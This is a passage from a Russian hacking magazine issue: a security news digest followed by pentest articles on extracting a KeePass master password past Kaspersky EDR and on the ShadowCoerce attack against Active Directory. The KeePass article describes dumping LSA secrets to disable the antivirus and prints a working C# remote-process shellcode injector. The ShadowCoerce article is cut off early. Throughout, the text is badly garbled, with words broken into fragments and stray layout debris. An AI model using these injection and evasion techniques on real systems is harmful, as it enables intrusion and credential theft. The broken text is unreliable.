взломан ные

аккаунты

хакеры анонсирова

ли

фейковый

airdrop, соп

роводив рекламу

вредонос

ной ссылкой , переходя по которой люди попадали

на фишинговый

сайт, внешне имитиру

ющий

официаль

ный

сайт Bored Ape

Yacht Club, где в итоге передавали

контроль

над своими

кошельками

зло

умышленни

кам .

Интерес

но , что в Yuga Labs уверяют

, что для взломан ных учетных записей

была включена

двухфактор

ная аутентифика

ция и меры безопасности

в целом

«были жестки ми ». В настоящее

время ведется рассле дова

ние случив шегося

но пока

совершенно

неясно , каким образом

злоумыш

ленни

ки смогли

получить доступ к аккаунтам

проекта .

По данным

OpenSea, после взлома владель

цев

сменили

24 NFT из кол

лекции Bored Apes и 30 из Mutant Apes. Впрочем , отмечает

ся , что некоторые

держатели

NFT могли сами передать токены другим

лицам из соображений

безопасности

. Стоимость

этих 54 NFT составля

ет пример но 13,7 миллиона

долларов

Незави

симый

исследова

тель

Zachxbt

вовсе

поделился

ссылкой

на Ethereum-адрес хакера, в настоящее

время помеченный

как фишинговый

на Etherscan. Судя по всему , за несколь

ко часов на этот адрес поступили

сра

зу 134 NFT.

Yuga

Labs

заявляют

, что постра дав ших

было

намного

меньше .

По информации

компании

, в ходе атаки были украдены

4 NFT Bored Apes, 6

Mutant Apes и 3 BAKC, общая стоимость

которых равна приблизитель

но 2,7 миллиона

долларов

««Я только что потерял на этом более 100 эфиров . *** неприем лемо. [Это был] официаль ный инстаграм *, и сайт выглядел настоящим .

Теперь я нахожусь в ситуации

когда мне придет ся подать в суд

на Yuga из за этого взлома . Я не откажусь

от своих 300 тысяч дол-

ларов, потому что их дерьмо взломали

», — пишет один из постра дав -

ших.0

«Это как наблюдать

за группой

людей, которая вбегает

в горящее

здание , на котором написано „бесплат

ные

деньги “», — злорадс

тву ют

другие пользовате

ли .

* Заблокиро ван в России , принад лежит компании Meta, признанной экстре мистской организа цией , запрещен ной на территории РФ.

DDOS’ИТЬ РОССИЮ СТАЛИ ЧАЩЕ

В марте 2022 года исследова тели «Лаборатории Каспер ского» зафиксирова ли на 54% больше атак, чем в феврале текущего года. По сравнению с мартом 2021 года атак стало почти в 8 раз больше .


Помимо	количества	атак, существен но выросла				и их продол житель	ность	: если в фев
рале 2022 года атаки в среднем длились					около 7 часов (самая долгая — более 90 часов), то
в марте средняя продол житель			ность	атак составила		более суток — 29,5 часа.

Также был установ лен рекорд максималь ной продол житель нос ти одной атаки за всю историю наблюдений : она продол жалась 145 часов, то есть чуть более 6 дней. Для сравнения : в фев рале и марте 2021 года средняя длитель ность инциден та не превыша ла 12 минут, а самая продол житель ная атака длилась не более 1,5 часа.

Наибо лее подверже ны атакам были государс твенные органы , финан совые организа - ции, образова тельные учреждения и СМИ.

В марте 2022 года самая большая нагрузка пришлась на финансовые организа ции , в первую очередь на банки : их доля в общем объеме атак выросла в три раза — до 35%.

РОССИЯН

БЛОКИРУЮТ НА GITHUB

В начале апреля 2022 года «Сбер» и «Альфа Банк» попали под блокиру

ющие

санкции

Минфина

США, и теперь аккаунты

банков

на GitHub оказались

забанены . Также о блокиров

ках сообщают

и частные

разработ

чики

, не имев

шие отношения

к банкам .

В начале марте 2022 года админис тра ция GitHub обещала

не блокиро

вать

все аккаунты

россий ских

пользовате

лей

без разбора

(хотя такие просьбы

к GitHub поступали

) и заверяла , что будет придер живать

ся законов, которые,

впрочем , могли обязать

компанию

блокиро

вать

тех или иных разработ

чиков

из за санкций

и законов об экспорте .

Как стало известно

в середине апреля , на GitHub были заблокиро

ваны

десятки

аккаунтов

, среди которых аккаунты

«Сбербанка

», «Альфа Банка »,

других

компаний

даже

индивиду

аль ных

разработ

чиков

частнос

ти ,

под

блокиров

ку

попали:

https://github.com/Sberbank-Technology,

https://github.com/sberbank-ai-lab и https://github.com/alfa-laboratory.

Помимо

компаний

, под блокиров

ками

оказались

и отдельные

разработ

чики. К примеру

, о бане личных

аккаунтов

сообщили

исследова

тели

Сергей

Бобров и Денис Колегов.

После

блокиров

ки

личного

GitHub-аккаунта

тот отмечает

ся как suspended,

а корпоратив

ный

— как fagged. В последнем

варианте

доступ к данным

репозитори

ев может сохранять

ся в течение несколь

ких часов, тогда как дос

туп к личным

аккаунтам

ограничи

вает

ся сразу .

После

блокиров

ки пользовате

ли получили письма , в которых сказано

, что

их аккаунт

может управляться из санкци онно

го региона . При

переходе

по ссылкам

из писем им было предложено

подать апелляцию

и объяснить

отношения

компании

или пользовате

ля с Северной

Кореей , Сирией , Кры

мом, ЛНР и ДНР.

МАСК НЕ ГОТОВ СОТРУДНИЧАТЬ С ГЕЙТСОМ

В конце апреля журналис ты слили в сеть личную переписку Билла Гейтса и Илона Маска , под линность которой вскоре подтвер дил последний . В чате Билл Гейтс обратил ся к Илону Маску , предлагая ему обсудить благот воритель ность и вопросы изменения климата . Судя по утекшим в сеть скриншотам , сначала Маск не возражал против встречи и возможно го сотрудни чества, однако потом все пошло не по плану .

→ «У вас все еще открыта короткая позиция на полмилли арда долларов против Tesla?» — неожидан но поинтересо вался Маск.

«Жаль это признавать , но я все еще ее не закрыл . [Но] я хотел бы обсудить возможнос ти благот воритель нос ти », — ответил Гейтс .

«Извините , я не могу серьезно относить ся к вашей благот ворительности, связан ной с изменени ем климата , когда у вас огромная короткая позиция про тив Tesla, компании , которая делает все для решения проблем климати ческих изменений », — заявил Маск, и на этом общение , похоже, прервалось .

Позже Маск проком ментировал утечку в Twitter:

→ «Я слышал от несколь ких человек на TED, что у Гейтса все еще открыт шорт на полмилли арда против Tesla, поэтому я и спросил его. Это совсем не секрет ».

Продолжение статьи0 →

hang

NOW!

BUY

w Click

-x

← 0Начало статьи

				hang		e
			C			e	E
		X					E
	-							d
	F									t
	D									i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.				c				.c
	.				c			e
		p	df				g
			df			n
				-x ha

ИСХОДНИКИ YANDEX DATABASE ОТКРЫТЫ

Компания «Яндекс» опубликова ла исходный код распре делен ной системы управления базами данных Yandex Database (YDB). Технология позволя ет создавать масшта биру емые отказоус той чивые сервисы , способ ные выдер живать большую операци онную нагрузку . Исходный код, документация , SDK и все инстру мен ты для работы с базой были опубликова ны на GitHub под лицензией Apache 2.0.

В компании расска зали , что YDB способ на обрабаты вать миллионы зап росов в секунду и сохраня ет работоспособ ность в случае выхода из строя сервера или даже целого дата центра . Это обеспечива ет стабиль ность соз данных на ее основе продук тов . Надежность YDB провере на и в масшта бах самого Яндекса, где она использует ся уже больше пяти лет. Проекты в YDB размеща ют команды Алисы , Такси , Маркета , Метрики и других сервисов — сейчас в системе почти 500 проектов .

Развернуть YDB можно как на собствен ных, так и на сторон них серверах —

втом числе в Yandex Cloud или других облачных сервисах .

««Мы уверены , что бурное развитие технологий , которое мы наблюда - ем в последние десятилетия , было бы невозможно без примене ния

открытого

исходного кода. Доступность

технологий

способс

тву ет их

распростра

нению

и стимули

рует

к ним интерес . Например

, сейчас

уже нельзя предста вить

себе

интернет без

таких баз

данных

как MySQL, PostgreSQL или ClickHouse. Публикуя

код YDB, мы продол -

жаем следовать

принципам

открытос ти и делимся со всеми наработ-

ками, на которые потратили

почти десять лет. Теперь технология

которая позволя

ет Яндексу быстро

масшта биро

вать ся и двигать ся

вперед , будет

доступна

всем

под

свобод ной

лицензией

Apache

2.0», — комменти

рует

Алексей Башкеев

, генеральный

директор Yandex

Cloud.

По словам разработ чиков , YDB решает задачи в одной из самых критич ных областей — позволя ет создавать интерак тивные приложе ния , которые можно быстро масшта биро вать по нагрузке и по объему данных .

««Мы разрабаты вали ее, исходя из ключевых требова ний к сервисам Яндекса. Во первых , это катастро фоустойчивость, то есть воз-

можность продол жить работу без деградации при отключении одного

из дата центров . Во вторых , это масшта бируемость на десятки тысяч серверов на чтение и на запись. В третьих , это строгая консистен - » тность данных », — гласит статья компании в блоге .

Орешении открыть исходники в компании пишут так:

««Открытие проекта создает интерес нейшую для всех win-win-ситу- ацию. У сообщес тва, с одной стороны , появляет ся возможность поль-

зоваться уникаль ными наработками , в которые Яндекс инвестировал

сотни человеко лет, познакомить

ся

с кодом,

свобод но

запускать

и разрабаты

вать

у себя решения на базе YDB. Технологии

, позволя

ющие Яндексу развивать

ся быстрее

, оператив

но реагировать

на рост

нагрузок

и масшта биро

вать ся , теперь доступны

каждому

другой

стороны

, сильно увеличит

ся вариатив

ность

пользовате

лей , мы смо-

жем получить обратную связь от мирового сообщес тва и сделать

базу

еще лучше . Важно сломать

барьер для пользовате

лей , которые заин-

тересованы

в технологии

но останав лива

ются

, опасаясь

закрытос

ти

и/или невозможнос

ти использовать

ее на своем оборудо

вании

или в

своих облаках ».

БАНКИ ВОЗВРАЩАЮТ НЕ ВСЁ

ЦБ РФ поделился интерес ной статис тикой : за 2021 год банков ские клиенты впервые перевели друг другу более 1 квадрилли она рублей , но из них 13,5 миллиар да рублей похитили

мошенники . Увы, банкам удалось вернуть постра давшим пользовате лям только 6,8% от этой суммы , или 920,5 миллиона рублей .

Это худший показатель за два года. Для сравнения , в 2020 году банки вернули клиентам 11,3% от всего объема украден ных мошенниками денег — 1,1 миллиар да рублей .

В целом в 2021 году число и объем мошенничес ких переводов выросли на 33,8% и 38,8% по сравнению с показателя ми 2020 года. Доля мошенничес ких переводов в общем объеме операций составила 0,00130%.

ВЗЛОМ METAMASK

Создатели

криптокошель

ка

MetaMask

опубликова

ли

предуп режде

ние

для пользовате

лей

iOS, сообщив , что при включен ном

резервном

копиро

вании данных

приложе

ния

seed

криптовалют

ных

кошельков

сохраня

ется

в Apple iCloud. Это предуп режде

ние

появилось

из за того, что один поль

зователь MetaMask уже потерял более 655 тысяч долларов

в результате

хорошо продуман

ной фишинговой

атаки .

Напом ню , что seed в криптовалют

ном

мире — это секретная

фраза вос

станов ления

, защищающая

доступ к содержимому

кошелька

и состоящая

из 12 слов.

ВTwitter разработ чики сообщили , что, если злоумыш ленники проник нут

вiCloud пользовате ля (с помощью фишинга или подобрав слишком слабый пароль), из за хранящих ся там бэкапов они смогут захватить контроль

над кошельком и похитить чужие средства .

К сожалению , такой сценарий

уже использовал

ся хакерами как минимум

против

одного

пользовате

ля

MetaMask,

который

итоге

лишил

ся 655 388 долларов

. Жертва

получила несколь

ко тексто

вых

сообщений

с просьбой

сбросить

учетные

данные

от учетной

записи Apple, а затем зло

умышленник

позвонил

с поддель

ного

номера Apple Inc., предста вив шись

сот

рудником службы поддер жки , рассле дующим

подозритель

ную активность.

Постра дав ший

поверил мошенникам

, выполнил

все их инструк ции

и пре

доставил

фейковым

специалис

там

поддер жки

шестизнач

ный

код

под

тверждения , полученный

от Apple. Вскоре его кошелек MetaMask опустел .

По сути, хакеры запросили

сброс пароля от учетной

записи Apple, и им тре

бовалось

лишь пройти дополнитель

ную

провер ку для доступа

к данным

iCloud

жертвы , где хранилась

резервная

копия MetaMask и нужный

злоумыш

ленни

кам seed.

Теперь

пользовате

лям

настоятель

но рекомендуют

исключить

MetaMask

из резервных

копий iCloud, изменив

соответс

тву ющий

параметр в настрой

ках: Settings → Profle → iCloud → Manage Storage → Backups.

28 ЛЕТ РУНЕТУ

Так как днем рождения Рунета считает ся 7 апреля 1994 года, в этом месяце ему исполнилось

28 лет. Количество доменных имен, зарегистри рован ных в зоне .RU, составля ет более

5 000 000, а в зоне .РФ — более 670 000.

По данным вице премьера РФ Дмитрия Чернышен ко , по итогам 2021 года ежемесяч ная ауди тория россий ско го сегмента интернета превыша ет 100 000 000 человек, а это более 80% населения страны .

Чернышен ко уточняет , что около 90% пользовате лей интернета заходят в сеть каждый день, а среди молодых россиян в возрасте 12–24 лет этот показатель и вовсе приблизил ся к 95%.

БАГ В GITLAB

В начале апреля инженеры GitLab устранили критичес кую уязвимость , которая позволяла удален ным злоумыш ленни кам получать доступ к учетным записям пользовате лей с помощью жестко заданных паролей. Проблема

CVE-2022-1162 затрагива ла как GitLab Community Edition (CE), так и Enterprise Edition (EE).

Разработ чики объясня ют, что статичес кие пароли по ошибке устанав ливались во время регистра ции на основе OmniAuth в GitLab CE/EE.

«Для

учетных

записей, зарегистри рован

ных

использовани

ем

«OmniAuth

(например

OAuth,

LDAP, SAML) в

GitLab CE/EE вер-

сий 14.7 до 14.7.7, 14.8 до 14.8.5 и 14.9 до 14.9.2, был установ лен

жестко

закодирован

ный

пароль, в теории

позволя

ющий

злоумыш

ленникам

захватывать

учетные

записи», — объясня

ет команда GitLab

в бюллетене

безопасности

Чтобы исправить ситуацию , команда GitLab удалила файл lib/gitlab/password.rb, который использовал ся для назначения жестко закоди рованного пароля констан те TEST_DEFAULT.

Теперь GitLab призыва ет пользовате лей как можно скорее обновить все установ ки до последних версий (14.9.2, 14.8.5 или 14.7.7), чтобы защититься от возможных атак. Также разработ чики добавили , что уже сбросили пароли некоторых пользовате лей GitLab.com, стремясь смягчить последс твия CVE- 2022-1162. При этом подчерки вается, что пока никаких признаков компро метации и эксплу атации этого бага хакерами обнаруже но не было.

КИБЕРАТАК В 2021 ГОДУ СТАЛО НА 6,5% БОЛЬШЕ

Экспер ты Positive Technologies подготови ли отчет о киберугрозах 2021 года, отметив домини рование шифроваль щиков среди вредонос ного ПО, повышение интенсивности атак на крип тобиржи и появление критичес ки опасных уязвимос тей , которые сразу же эксплу ати рова лись злоумыш ленниками во множес тве организа ций по всему миру.

Общее количество атак в 2021 году увеличи лось на 6,5% по сравнению с 2020 годом. При этом доля целевых атак в сравнении с прошлым годом выросла на 4 процен тных пункта и составила 74% от общего количества .

Как и в 2020 году, 86% всех атак были направле ны на организа ции. В тройку наиболее часто

атакуемых отраслей вошли госучрежде ния (16%), медучрежде ния (11%) и промыш ленные ком пании (10%).

Чаще всего хакеры использовали малварь (63%), социаль ную инженерию (50%), а также экс плуати рова ли недостатки защиты и уязвимос ти в софте (32%).

Среди вредоно сов , которые использовались в атаках на компании , чаще всего встречались шифроваль щики : они были задейство ваны в 60% случаев .

Количес тво атак на криптобир жи также выросло на 44% в сравнении с 2020 годом. К тому же в прошлом году произош ла одна из крупней ших краж криптовалю ты в истории : злоумыш ленни ки похитили около 600 миллионов долларов у PolyNetwork.

ДРАЙВЕРЫ AMD СЛУЧАЙНО РАЗГОНЯЮТ ПРОЦЕССОРЫ

Компания AMD изучает проблему в своих графичес ких драйверах , из за которой самопроиз вольно меняется произво дительность процес соров AMD Ryzen. Ранее пользовате ли обнаружи ли, что в их настрой ках BIOS происхо дят необъясни мые изменения , которых они не делали.

Сущес твование этой странной проблемы предста вители AMD подтвер дили в беседе с журналис тами сайта Tom’s Hardware. К сожалению , пока ком пания не предос тавила никаких подробнос тей об ошибке в GPU-драйверах , а также не давала рекомендаций , как устранить ошибку , и не называла пред полагаемых сроков ее исправления .

Пока известно лишь то, что проблема автомати чес кого разгона затрагива ет пользовате лей , которые используют одновремен но видеокар ты и процес соры производс тва AMD, причем баг проявля ется далеко не у всех.

Если судить по тому, когда в сети появились первые сообщения об этой ошибке , можно предположить , что проблема возникла в AMD Adrenalin вер сии 22.3.1, выпущенной 17 марта 2022 года. Интерес но, что компания AMD уже выпустила Adrenalin Edition 22.4.1, однако в примеча ниях к этому релизу нет никаких упомина ний об ошибках , поэтому неясно , устраняет ли новая версия баги.

Пока всем, кто использует драйвер Adrenalin, рекомендует ся обновить его до последней доступной версии и надеять ся , что AMD незаметно устранит баг с помощью срочного патча .

Пользовате ли Reddit и вовсе предлага ют бороться с багом, создавая новые профили настро ек, так как замена старых сохранен ных профилей

на новые порой помогает . Еще один обходной путь — удалить Ryzen Master SDK из Adrenalin, так как именно этот компонент позволя ет модулям драйвера вносить изменения в настрой ки BIOS и предназна чен для облегчения доступа

к разгону процес сора.

ДРУГИЕ ИНТЕРЕСНЫЕ СОБЫТИЯ МЕСЯЦА

На хакерских форумах набирает популярность похититель паролей BlackGuard MailChimp взломали , и мошенники атакова ли пользовате лей кошельков Trezor

Роскомнад зор запретил рекламиро вать ресурсы Google

Apple оставила без исправлений критичес кие баги в macOS Big Sur и Catalina

Вредонос ный сервис Parrot TDS использует 16 500 сайтов для распростра нения малвари Утекшие исходники шифроваль щика Conti используют ся для атак на россий ские компании

Разработ чики браузе ра Brave считают страницы Google AMP вредными для конфиден циаль нос ти

«Сбербанк » блокиро вал масштаб ную атаку на банков ские карты россиян Обнаружен подполь ный маркет плейс Industrial Spy, торгующий данными

Приложе ния для видеокон ферен ций «слушают » пользовате лей даже после нажатия кнопки Mute

			hang		e
		C			e	E
	X					E
	-						d
	F							t
	D							i
	D							r
P					NOW!			o
P
	wClick			BUY				o m	COVERSTORY
	wClick		to					o m	COVERSTORY


w
w							.c
	.			c			.c
	p			c		g
		df			n		e
			-x ha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.				c			.c
		p			c		g
			df			n		e
				-x ha

ИНЖЕКТИМ ШЕЛЛ-КОД В ПАМЯТЬ KEEPASS, ОБОЙДЯ АНТИВИРУС


Недав но на пентесте			мне понадобилось
вытащить мастер пароль открытой				базы
данных	KeePass	из памяти процес са
с помощью утилиты		KeeThief из арсенала

GhostPack. Все бы ничего, да вот EDR, сле


дящий	за		системой		, категоричес			ки
не давал мне этого сделать						— ведь
под капотом KeeThief живет классичес							кая
процеду	ра инъекции			шелл кода в удален
ный процесс		, что не может остаться
незамечен ным			в 2022 году.

snovvcrash

Безопасник, временами питонщик, местами криптоана(рхист)литик, по необходимости системный администратор snovvcrash@protonmail.ch

В этой статье мы рассмот рим замечатель ный сторон ний механизм D/Invoke для C#, позволя ющий эффективно дергать Windows API в обход средств защиты, и перепишем KeeThief, чтобы его не ловил великий и ужасный «Кас перский ». Погнали !

ПРЕДЫСТОРИЯ

В общем, пребываю я на внутряке , домен админ уже пойман и наказан, но вот осталась одна вредная база данных KeePass, которая, конечно же,

не захотела сбрутить ся с помощью hashcat и keepass2john.py. В KeePass —

доступы к критичес ки важным ресурсам инфры, определя ющим исход внут ряка, поэтому добрать ся до нее нужно . На рабочей станции , где пользак кру тит интересу ющую нас базу, глядит в оба Kaspersky Endpoint Security (он же KES), который не дает рассла бить ся . Рассмот рим , какие есть варианты получить желанный мастер пароль, не прибегая к социнженерии .

Прежде всего скажу , что успех этого предпри ятия — в обязатель ном использовании крутой малвари KeeThief из коллекции GhostPack авторства небезызвес тных @harmj0y и @tifkin_. Ядро программы — кастомный шелл код, который вызывает RtlDecryptMemory в отношении зашифрован ной области виртуаль ной памяти KeePass.exe и выдергива ет оттуда наш мас тер пароль. Если есть шелл код, нужен и загрузчик , и с этим возника ют труд ности, когда на хосте присутс тву ет EDR...

Впрочем , мы отвлеклись . Какие были варианты ?

Потушить AV

Самый простой (и глупый ) способ — вырубить к чертям «Каспер ского» на пару секунд. «Это не редтим , поэтому право имею!» — подумал я. Так как привиле гии админис тратора домена есть, есть и доступ к серверу адми нистри рования KES. Следова тельно, и к учетке KlScSvc (в этом случае использовалась локальная УЗ), креды от которой хранят ся среди секретов

LSA в плейнтек сте .

Порядок действий простой . Дампаю LSA с помощью secretsdump.py.

Потрошим LSA

Гружу консоль админис три рова ния KES с официаль ного сайта и логинюсь, указав хостнейм KSC.

Консоль админис три рова ния KES

Стопорю «Каспера » и делаю свои грязные делишки .

AdobeHelperAgent.exe, ну вы поняли, ага

Proft! Мастер пароль у нас. После окончания проекта я опробовал другие способы решить эту задачу.

Получить сессию C2

Многие C2-фреймвор ки умеют тащить за собой DLL рантай ма кода C# (Common Language Runtime, CLR) и загружать ее отражен но по принципу RDI (Refective DLL Injection) для запуска малвари из памяти. Теоретичес ки это может повлиять на процесс отлова управляемо го кода, исполняемо го через такой трюк.

Полноцен ную сессию Meterpreter при активном антивиру се Каспер ского получить трудно из за обилия артефак тов в сетевом трафике , поэтому его execute-assembly я даже пробовать не стал. А вот модуль execute-assembly Cobalt Strike принес свои результаты , если правиль но получить сессию beacon (далее скриншоты будут с домашнего KIS, а не KES, но все техники работают и против последне го — провере но).

KeeTheft.exe с помощью execute-assembly CS

Все козыри раскры вать

не буду — мне еще работать пентесте

ром , однако

этот метод тоже не представ ляет

большого

интереса

в нашей ситуации

Для гладкого

получения сессии «маячка » нужен внешний сервак , на который

надо накрутить

валидный

сертификат

для

шифрования

SSL-трафика

а заражать таким образом

машину с внутренне

го периметра заказчика

—

совсем невежливо

Перепаять инструмент

Самый интерес ный и в то же время трудозат ратный способ — переписать логику инъекции шелл кода таким образом , чтобы EDR не спалил в момент исполнения . Это то, ради чего мы сегодня собрались , но для начала немного теории.

Дело здесь именно в уклонении от эвристичес кого анализа , так как, если спрятать сигнатуру малвари с помощью недетектиру емо го упаков щика , дос туп к памяти нам все равно будет запрещен из за фейла инъекции .

Запуск криптован ного KeeTheft.exe при активном EDR

Продолжение статьи0 →

			hang		e
		C			e	E
	X					E
	-						d
	F								t
	D								i
	D								r
P					NOW!				o
P
	wClick			BUY					o m	COVERSTORY
	wClick		to						o m	COVERSTORY


w
w								.c
	.					g		.c
	p			c		g
		df		c	n		e
			-x ha

hang

NOW!

←

0НАЧАЛО СТАТЬИw Click

BUY

-x ha

ИНЖЕКТИМ ШЕЛЛ-КОД В ПАМЯТЬ KEEPASS, ОБОЙДЯ АНТИВИРУС

КЛАССИЧЕСКАЯ ИНЪЕКЦИЯ ШЕЛЛ-КОДА

Оглянем ся назад и рассмот рим классичес кую технику внедрения сторон него кода в удален ный процесс . Для этого наши предки пользовались священ ным трио Win32 API:

•VirtualAllocEx — выделить место в виртуаль ной памяти удален ного процес са под наш шелл код.

•WriteProcessMemory — записать байты шелл кода в выделенную область памяти.

•CreateRemoteThread — запустить новый поток в удален ном процес се, который стартует свежеза писанный шелл код.

Исполне ние шелл кода с помощью Thread Execution (изображение — elastic.co)

Напишем простой PoC на C#, демонстри рующий эту самую классичес кую инъекцию шелл кода.

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

namespace SimpleInjector

{

public class Program

{

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling

= true)]

static extern IntPtr OpenProcess(

uint processAccess,

bool bInheritHandle,

int processId);

[DllImport("kernel32.dll", SetLastError = true, ExactSpelling

= true)]

static extern IntPtr VirtualAllocEx(

IntPtr hProcess,

IntPtr lpAddress,

uint dwSize,

uint flAllocationType,

uint flProtect);

[DllImport("kernel32.dll")]

static extern bool WriteProcessMemory(

IntPtr hProcess,

IntPtr lpBaseAddress,

byte[] lpBuffer,

Int32 nSize,

out IntPtr lpNumberOfBytesWritten);

[DllImport("kernel32.dll")]

static extern IntPtr CreateRemoteThread(

IntPtr hProcess,

IntPtr lpThreadAttributes,

uint dwStackSize,

IntPtr lpStartAddress,

IntPtr lpParameter,

uint dwCreationFlags,

IntPtr lpThreadId);

public static void Main()

{

// msfvenom -p windows/x64/messagebox TITLE='MSF'

TEXT='Hack the Planet!' EXITFUNC=thread -f csharp

byte[] buf = new byte[] { };

// Получаем PID процесса explorer.exe

int processId = Process.GetProcessesByName("explorer")[0]

.Id;

// Получаем хендл процесса по его PID (0x001F0FFF =

PROCESS_ALL_ACCESS)

IntPtr hProcess = OpenProcess(0x001F0FFF, false,

processId);

// Выделяем область памяти 0x1000 байт (0x3000 =

MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)

IntPtr allocAddr = VirtualAllocEx(hProcess, IntPtr.Zero,

0x1000, 0x3000, 0x40);

// Записываем шелл-код в выделенную область

_ = WriteProcessMemory(hProcess, allocAddr, buf, buf.

Length, out _);

// Запускаем поток

_ = CreateRemoteThread(hProcess, IntPtr.Zero, 0,

allocAddr, IntPtr.Zero, 0, IntPtr.Zero);

}

Скомпилиро вав и запустив инжектор, с помощью Process Hacker можно наб людать, как в процес се explorer.exe запустится новый поток, рисующий нам диалоговое окно MSF.

Классичес кая инъекция шелл кода

Если просто положить такой бинарь на диск с активным средством анти вирусной защиты, реакция будет незамедлитель ной независимо от содер жимого массива buf, то есть нашего шелл кода. Все дело в комбинации потенциаль но опасных вызовов Win32 API, которые заведомо используют ся в большом количестве зловредов . Для демонстра ции я перекомпилирую инжектор с пустым массивом buf и залью результат на VirusTotal. Реакция ресурса говорит сама за себя.

VirusTotal намекает ...

Как антивирус ное ПО понимает , что перед ним инжектор, даже без динами ческого анализа ? Все просто : пачка атрибутов DllImport, занимающих половину нашего исходника , кричит об этом на всю деревню . Например , с помощью такого волшебно го кода на PowerShell я могу посмотреть все импорты в бинаре .NET.

Здесь использует ся сборка System.Reflection.Metadata, доступная «из коробки » в PowerShell Core. Установ ка описана в докумен тации Microsoft.

$assembly = "C:\Users\snovvcrash\source\repos\SimpleInjector\bin\x64\

Release\SimpleInjector.exe"

$stream = [System.IO.File]::OpenRead($assembly)

$peReader = [System.Reflection.PortableExecutable.PEReader]::new(

$stream, [System.Reflection.PortableExecutable.PEStreamOptions]::

LeaveOpen -bor [System.Reflection.PortableExecutable.PEStreamOptions

]::PrefetchMetadata)

$metadataReader = [System.Reflection.Metadata.PEReaderExtensions]::

GetMetadataReader($peReader)

$assemblyDefinition = $metadataReader.GetAssemblyDefinition()

foreach($typeHandler in $metadataReader.TypeDefinitions) {

$typeDef = $metadataReader.GetTypeDefinition($typeHandler)

foreach($methodHandler in $typeDef.GetMethods()) {

$methodDef = $metadataReader.GetMethodDefinition(

$methodHandler)

$import = $methodDef.GetImport()

if ($import.Module.IsNil) {

continue

}

$dllImportFuncName = $metadataReader.GetString($import.Name)

$dllImportParameters = $import.Attributes.ToString()

$dllImportPath = $metadataReader.GetString($metadataReader.

GetModuleReference($import.Module).Name)

Write-Host "$dllImportPath, $dllImportParameters`n

$dllImportFuncName`n"

}

Смотрим импорты в SimpleInjector.exe

Эти импорты представ ляют собой способ вза имодей ствия приложе ний .NET с неуправля емым кодом — таким, например , как функции библиотек user32.dll, kernel32.dll. Этот механизм называется P/Invoke (Platform Invocation Services), а сами сигнатуры импортируемых фун кций с набором аргумен тов и типом возвра щаемого значения можно найти на сайте pinvoke.net.

При анализе этого добра в динамике , как ты понимаешь , дела обстоят еще проще : так как все EDR имеют привыч ку вешать хуки на userlandинтерфейсы , вызовы подозритель ных API сразу поднимут тревогу . Подробнее

об этом можно почитать в ресер че @ShitSecure, а в лаборатор ных условиях хукинг нагляднее всего продемонс трировать с помощью API Monitor.

Хукаем kernel32.dll в SimpleInjector.exe

Итак, что же со всем этим делать?

Продолжение статьи0 →

			hang			e
		C				e	E
	X						E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
	wClick			BUY					o m	ВЗЛОМ
	wClick		to						o m	ВЗЛОМ


w
w				c				.c
	.			c				.c
	p						g
		df	-x			n		e
			-x		ha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w				c				o
	.				c			.c
		p					g
			df			n		e
				-x ha

КАК РАБОТАЕТ НОВАЯ АТАКА НА ACTIVE DIRECTORY

AYSerkov

Пентестер в компании T-

Hunter 1215poppunk@mail.ru

В этой статье я покажу, как работает атака ShadowCoerce, которая использует службу теневого копирования (VSS) и позволя ет принудить учетку контрол лера домена Active Directory авторизо вать ся на узле злоумыш ленни ка . А это, как ты догадываешь ся , может привес ти к захвату домена.

PETITPOTAM И PRINTERBUG

Ранее в тех же целях применя лись техники PetitPotam и PrinterBug.

PetitPotam использовал функцию EfsRpcOpenFileRaw из протоко ла

Microsoft Encrypting File System Remote Protocol (MS-EFSRPC), который пред

назначен для выполнения операций с зашифрован ными данными , хранящи мися в удален ных системах .

PrinterBug злоупот реблял функци ей

RpcRemoteFindFirstPrinterChangeNotificationEx в протоко ле Microsoft Print System Remote Protocol (MS-RPRN). При атаке пользователь домена может заставить любую машину, на которой запущена служба очереди печати, подклю чить ся к машине со включен ным неограничен ным делегирова нием. Для эксплу ата ции этого бага применя ется инстру мент Krbrelayx.

Подробнее об этих уязвимос тях :

•Compromising a Domain With the Help of a Spooler

•Захват контрол лера домена с помощью атаки

PetitPotam

ShadowCoerce — новый способ принуди тель ной аутентифика ции . Он исполь зует протокол службы теневого копирования VSS (MS-FSRVP). Но прежде чем говорить о нем, расска жу пару слов о самой VSS.

ЧТО ТАКОЕ VSS

Volume Shadow Copy Service (VSS) — это фича Windows Server, которая поз

воляет тихо, незаметно и центра лизо ван но бэкапить пользователь ские дан ные.

Представь , что у тебя есть файловый сервер , бэкап которого делается ежедневно . Утром ты внес изменения в критичес ки важный документ, а в кон це рабочего дня что то напутал и случай но удалил этот файл. Восста новить его из бэкапа будет невозможно , так как в утреннюю сессию он не попал. Однако если на сервере включена служба VSS, то можно не торопиться ломать клавиату ру об колено и кидать монитор в окошко — файл можно будет спасти !

По сути, VSS копирует всю информацию , хранящу юся на диске , но при этом отслежива ет изменения и берет только нужные блоки . Сами копии дела ются автомати чес ки каждый час, и по умолчанию Windows хранит их

вколичестве 64 штук. VSS — штука удобная и повсемес тно использует ся

вдоменных сетях.

СТЕНД

Для проведе ния атаки нам понадобит ся тестовый стенд:

•контрол лер домена (DC) — Windows Server 2016;

•центр сертифика ции (AD CS) — Windows Server 2016 с включен ной служ

бой Web Enrollment;

•скомпро метированная учетная запись пользовате ля с низкими привиле гиями.

Судя по документации Microsoft, протокол удален ного файлового сервера

VSS (MS-FSRVP):

•создает теневые копии файловых ресурсов на удален ных компьюте рах;

•делает резервное копирование приложе ний;

•восста навливает данные на файловых ресурсах SMB2.

Чтобы наш контрол лер домена начал делать теневые копии, нужно установить службу агента VSS из меню «Роли сервера ».

На момент написания статьи известны только две уязвимые функции , которые обрабаты вает MS-FSRVP: IsPathSupported и IsPathShadowCopied. Именно они позволя ют поднять наши права , так как обе работают с удален ными путями UNC.

КАК РАБОТАЕТ SHADOWCOERCE

